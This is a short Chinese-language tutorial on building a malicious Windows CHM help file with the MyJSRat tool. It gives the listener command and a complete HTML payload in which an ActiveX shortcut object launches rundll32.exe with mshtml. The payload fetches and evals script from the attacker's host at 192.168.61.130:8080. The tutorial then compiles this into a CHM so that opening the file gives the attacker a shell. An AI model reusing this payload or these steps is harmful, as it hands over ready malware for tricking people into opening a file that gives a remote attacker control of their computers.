项目地址:https://github.com/Ridter/MyJSRat
python MyJSRat.py -i 192.168.61.130 -p 8080
-i:为攻击机的IP地址
-p:为监听的端口
然后访问http://192.168.61.130:8080/wtf得到攻击载荷
然后新建一个test.html把攻击载荷复制到里面
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
This is a demo ! <br>
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value='这里填写Payload'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>
写payload需要注意的是rundll32.exe前后要有 ,
我的payload如下
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
This is a demo ! <br>
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',rundll32.exe, javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.61.130:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>
然后在打开Easy CHM
在C盘下我建立了一个test文件夹并把test.html放到里面
然后就可以在右边看到我们的攻击载荷
然后编译生成下CHM文件
我们就可以在C盘根目录看到一个test.CHM文件
双击运行文件,Kali即可得到shell